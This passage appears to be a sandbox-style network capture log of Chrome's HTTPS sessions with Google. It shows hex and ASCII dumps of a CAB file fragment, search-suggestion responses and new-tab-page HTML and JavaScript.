2024-05-04 07:50:15 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-05-04 07:50:15 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.3	49716	142.250.68.68	443	6008	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-04 07:50:21 UTC	627	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIm2yQEIorbJAQipncoBCL/qygEIlKHLAQiLq8wBCIWgzQEI3L3NAQi4yM0BCLnKzQEIitPNAQj1080BCMzWzQEIp9jNAQi22M0BCPnA1BUYuL/NARj1yc0BGLnSzQEYx9jNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-04 07:50:21 UTC	1191	IN	HTTP/1.1 200 OK Date: Sat, 04 May 2024 07:50:21 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-3-Ixkks4Kt1YExrOPRMe6A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-05-04 07:50:21 UTC	64	IN	Data Raw: 65 36 35 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 67 68 6f 73 74 73 20 73 65 61 73 6f 6e 20 34 22 2c 22 73 61 6d 20 61 73 68 20 6d 75 73 69 63 20 73 74 6f 72 65 73 20 63 6c 6f 73 69 6e 67 22 2c Data Ascii: e65)]}'["",["ghosts season 4","sam ash music stores closing",
2024-05-04 07:50:21 UTC	1255	IN	Data Raw: 22 77 72 65 78 68 61 6d 20 61 66 63 20 70 6c 61 79 65 72 73 22 2c 22 74 65 78 61 73 20 74 6f 72 6e 61 64 6f 65 73 22 2c 22 6e 63 69 73 20 68 61 77 61 69 69 20 63 62 73 22 2c 22 61 6d 65 72 69 63 61 6e 73 20 74 75 72 6b 73 20 61 6e 64 20 63 61 69 63 6f 73 20 61 6d 6d 75 6e 69 74 69 6f 6e 22 2c 22 6d 69 6b 65 20 74 72 6f 75 74 20 69 6e 6a 75 72 79 22 2c 22 6d 65 67 61 20 6d 69 6c 6c 69 6f 6e 73 20 77 69 6e 6e 69 6e 67 20 6e 75 6d 62 65 72 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 Data Ascii: "wrexham afc players","texas tornadoes","ncis hawaii cbs","americans turks and caicos ammunition","mike trout injury","mega millions winning numbers"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4
2024-05-04 07:50:21 UTC	1255	IN	Data Raw: 45 76 56 47 70 35 54 56 6c 59 59 30 64 6a 53 31 4e 47 65 6d 35 4b 53 45 6b 31 65 47 39 6d 62 6b 70 4f 64 6d 6b 33 62 45 6b 31 52 30 30 31 52 31 42 59 57 47 6c 57 65 47 35 4a 65 48 45 7a 4e 56 6c 78 4d 44 4a 75 52 6c 5a 54 55 56 4d 78 62 7a 68 5a 53 6b 70 4d 56 46 56 77 51 56 4e 53 5a 33 46 7a 56 6c 56 31 55 55 39 6a 5a 48 6c 50 56 48 70 77 62 48 42 77 4e 32 70 56 4d 7a 46 72 4b 32 38 34 56 6c 46 4b 53 6b 73 30 52 57 52 53 55 58 64 6d 56 46 49 31 65 6e 64 58 51 7a 56 4c 61 6e 4e 6a 62 6c 42 49 53 6a 46 76 64 6b 35 71 52 6d 5a 7a 4b 32 55 34 59 54 46 4a 4d 47 56 32 4d 55 70 4d 51 55 74 58 54 31 4e 44 4d 32 39 47 55 6a 46 57 4e 6c 46 42 54 6b 74 42 4e 55 63 32 55 55 46 75 52 47 56 6e 4e 44 51 77 53 45 31 61 52 32 70 49 54 57 6c 51 52 56 6c 48 62 7a 6c 32 63 Data Ascii: EvVGp5TVlYY0djS1NGem5KSEk1eG9mbkpOdmk3bEk1R001R1BYWGlWeG5JeHEzNVlxMDJuRlZTUVMxbzhZSkpMVFVwQVNSZ3FzVlV1UU9jZHlPVHpwbHBwN2pVMzFrK284VlFKSks0RWRSUXdmVFI1endXQzVLanNjblBISjFvdk5qRmZzK2U4YTFJMGV2MUpMQUtXT1NDM29GUjFWNlFBTktBNUc2UUFuRGVnNDQwSE1aR2pITWlQRVlHbzl2c
2024-05-04 07:50:21 UTC	1118	IN	Data Raw: 6d 70 6f 62 6b 52 69 56 32 4a 36 53 6b 56 72 57 6e 64 52 56 6b 74 78 62 79 39 4c 4e 53 74 50 5a 45 31 4c 65 6b 52 74 57 57 4e 54 62 46 52 46 51 32 74 32 62 47 56 79 59 31 52 45 53 47 4a 4a 4e 6d 51 72 4d 6d 31 68 4d 44 45 34 5a 48 64 71 53 31 4e 42 51 6a 51 72 55 32 68 50 55 6e 6f 78 53 53 74 6a 57 55 39 72 64 58 6c 56 56 46 68 44 63 6b 31 49 4d 55 4e 52 5a 30 6c 59 57 6a 4d 31 64 30 4a 71 64 44 4d 32 61 6c 4a 70 65 6e 68 54 56 7a 49 35 54 6b 4a 50 65 56 4e 4c 4e 6b 56 61 56 54 56 36 4d 45 6b 30 4e 44 6c 32 65 6e 46 34 57 55 78 35 51 6a 4e 47 61 44 68 78 51 6c 42 56 5a 54 64 53 55 6e 52 45 54 30 52 42 55 58 6c 4e 54 55 52 51 5a 6a 56 34 63 48 67 34 52 47 56 69 53 46 4a 57 54 54 46 34 63 6a 42 75 61 57 46 57 57 54 42 73 57 6b 46 32 4f 46 52 49 4d 30 46 5a Data Ascii: mpobkRiV2J6SkVrWndRVktxby9LNStPZE1LekRtWWNTbFRFQ2t2bGVyY1RESGJJNmQrMm1hMDE4ZHdqS1NBQjQrU2hPUnoxSStjWU9rdXlVVFhDck1IMUNRZ0lYWjM1d0JqdDM2alJpenhTVzI5TkJPeVNLNkVaVTV6MEk0NDl2enF4WUx5QjNGaDhxQlBVZTdSUnRET0RBUXlNTURQZjV4cHg4RGViSFJWTTF4cjBuaWFWWTBsWkF2OFRIM0FZ
2024-05-04 07:50:21 UTC	64	IN	Data Raw: 33 61 0d 0a 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 45 4e 54 49 54 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 5d 7d 5d 0d 0a Data Ascii: 3aQUERY","QUERY","QUERY","ENTITY","QUERY","QUERY","QUERY"]}]
2024-05-04 07:50:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.3	49719	142.250.68.68	443	6008	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-04 07:50:21 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-04 07:50:21 UTC	967	IN	HTTP/1.1 200 OK Version: 629707551 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sat, 04 May 2024 07:50:21 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-05-04 07:50:21 UTC	25	IN	Data Raw: 31 33 0d 0a 29 5d 7d 27 0a 7b 22 64 64 6c 6a 73 6f 6e 22 3a 7b 7d 7d 0d 0a Data Ascii: 13)]}'{"ddljson":{}}
2024-05-04 07:50:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.3	49717	142.250.68.68	443	6008	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-04 07:50:21 UTC	530	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIm2yQEIorbJAQipncoBCL/qygEIlKHLAQiLq8wBCIWgzQEI3L3NAQi4yM0BCLnKzQEIitPNAQj1080BCMzWzQEIp9jNAQi22M0BCPnA1BUYuL/NARj1yc0BGLnSzQEYx9jNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-04 07:50:21 UTC	967	IN	HTTP/1.1 200 OK Version: 629707551 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sat, 04 May 2024 07:50:21 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-05-04 07:50:21 UTC	288	IN	Data Raw: 65 33 35 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 51 61 20 67 62 5f 68 62 20 67 62 5f 54 64 20 67 62 5f 6e 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 5c Data Ascii: e35)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Qa gb_hb gb_Td gb_nd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\
2024-05-04 07:50:21 UTC	1255	IN	Data Raw: 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 72 64 20 67 62 5f 6b 64 20 67 62 5f 78 64 20 67 62 5f 77 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 71 64 20 67 62 5f 67 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4f 63 20 67 62 5f 71 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 Data Ascii: 3e\u003c\/div\u003e\u003cdiv class\u003d\"gb_rd gb_kd gb_xd gb_wd\"\u003e\u003cdiv class\u003d\"gb_qd gb_gd\"\u003e\u003cdiv class\u003d\"gb_Oc gb_q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003
2024-05-04 07:50:21 UTC	1255	IN	Data Raw: 61 62 65 6c 5c 75 30 30 33 64 5c 22 47 6f 6f 67 6c 65 5c 22 20 68 72 65 66 5c 75 30 30 33 64 5c 22 2f 3f 74 61 62 5c 75 30 30 33 64 72 72 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4e 63 20 67 62 5f 35 64 5c 22 20 61 72 69 61 2d 68 69 64 64 65 6e 5c 75 30 30 33 64 5c 22 74 72 75 65 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 71 64 20 67 62 5f 65 64 20 67 62 5f Data Ascii: abel\u003d\"Google\" href\u003d\"/?tab\u003drr\"\u003e\u003cspan class\u003d\"gb_Nc gb_5d\" aria-hidden\u003d\"true\" role\u003d\"presentation\"\u003e\u003c\/span\u003e\u003c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_qd gb_ed gb_
2024-05-04 07:50:21 UTC	846	IN	Data Raw: 67 62 5f 55 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 37 63 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 78 20 67 62 5f 4b 20 67 62 5f 6a 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 66 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 61 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 64 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 53 65 61 72 63 68 20 4c 61 62 73 5c 22 20 68 72 65 66 5c 75 30 30 33 64 5c 22 68 74 74 70 73 3a 2f 2f 6c 61 62 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 65 61 72 63 68 3f 73 6f 75 72 63 65 5c 75 30 30 33 64 6e 74 70 5c 22 20 74 61 Data Ascii: gb_Ud\"\u003e\u003cdiv class\u003d\"gb_7c\"\u003e \u003cdiv class\u003d\"gb_x gb_K gb_j\"\u003e \u003cdiv class\u003d\"gb_f\"\u003e \u003ca class\u003d\"gb_d\" aria-label\u003d\"Search Labs\" href\u003d\"https://labs.google.com/search?source\u003dntp\" ta
2024-05-04 07:50:21 UTC	541	IN	Data Raw: 32 31 36 0d 0a 2e 35 54 36 33 33 2d 34 34 33 71 34 2d 31 20 35 2e 35 2d 34 2e 35 74 2d 2e 35 2d 37 2e 35 6c 2d 37 38 2d 31 31 37 71 2d 31 35 2d 32 31 2d 32 32 2e 35 2d 34 36 74 2d 37 2e 35 2d 35 32 76 2d 31 31 30 48 34 33 30 5a 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 70 61 74 68 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 76 67 5c 75 30 30 33 65 20 20 5c 75 30 30 33 63 5c 2f 61 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 20 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 6b 20 67 62 5f 78 20 67 62 5f 4b 5c 22 20 64 61 74 61 2d 6f 67 73 72 2d 66 62 5c 75 30 30 33 64 5c 22 74 72 75 65 5c 22 20 64 61 74 61 2d 6f 67 73 72 2d 61 6c 74 5c Data Ascii: 216.5T633-443q4-1 5.5-4.5t-.5-7.5l-78-117q-15-21-22.5-46t-7.5-52v-110H430Z\"\u003e\u003c\/path\u003e \u003c\/svg\u003e \u003c\/a\u003e \u003c\/div\u003e \u003c\/div\u003e \u003cdiv class\u003d\"gb_k gb_x gb_K\" data-ogsr-fb\u003d\"true\" data-ogsr-alt\
2024-05-04 07:50:21 UTC	1255	IN	Data Raw: 38 30 30 30 0d 0a 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 68 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 36 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 36 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 Data Ascii: 8000class\u003d\"gb_h\" focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M6,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,20c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM6,20c1.1,0 2,-0.9 2,-2s-0.9,-2
2024-05-04 07:50:21 UTC	1255	IN	Data Raw: 20 67 62 5f 4a 63 20 67 62 5f 36 64 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 47 6f 6f 67 6c 65 5c 22 20 68 72 65 66 5c 75 30 30 33 64 5c 22 2f 3f 74 61 62 5c 75 30 30 33 64 72 72 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4e 63 20 67 62 5f 35 64 5c 22 20 61 72 69 61 2d 68 69 64 64 65 6e 5c 75 30 30 33 64 5c 22 74 72 75 65 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 Data Ascii: gb_Jc gb_6d\" aria-label\u003d\"Google\" href\u003d\"/?tab\u003drr\"\u003e\u003cspan class\u003d\"gb_Nc gb_5d\" aria-hidden\u003d\"true\" role\u003d\"presentation\"\u003e\u003c\/span\u003e\u003c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e
2024-05-04 07:50:21 UTC	1255	IN	Data Raw: 22 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 61 5c 75 30 30 33 64 21 30 7d 7d 29 3b 74 72 79 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 28 29 5c 75 30 30 33 64 5c 75 30 30 33 65 7b 7d 3b 5f 2e 71 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 5c 22 74 65 73 74 5c 22 2c 63 2c 62 29 3b 5f 2e 71 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 5c 22 74 65 73 74 5c 22 2c 63 2c 62 29 7d 63 61 74 63 68 28 63 29 7b 7d 72 65 74 75 72 6e 20 61 7d 28 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 6a 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 2e 67 62 5f 6b 20 2e 67 62 5f 64 5c 22 29 2c 6b 64 5c Data Ascii: ",{get:function(){a\u003d!0}});try{const c\u003d()\u003d\u003e{};_.q.addEventListener(\"test\",c,b);_.q.removeEventListener(\"test\",c,b)}catch(c){}return a}();\n}catch(e){_._DumpException(e)}\ntry{\nvar jd\u003ddocument.querySelector(\".gb_k .gb_d\"),kd\
2024-05-04 07:50:21 UTC	1255	IN	Data Raw: 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 5f 2e 75 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 74 64 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 44 5c 22 29 3b 7d 3b 77 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 76 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5c 6e 5f 2e 79 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 5f 2e 78 64 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 74 64 Data Ascii: c}return[]};_.ud\u003dfunction(a){if(a instanceof _.td)return a.i;throw Error(\"D\");};wd\u003dfunction(a){return new vd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};\n_.yd\u003dfunction(a,b\u003d_.xd){if(a instanceof _.td
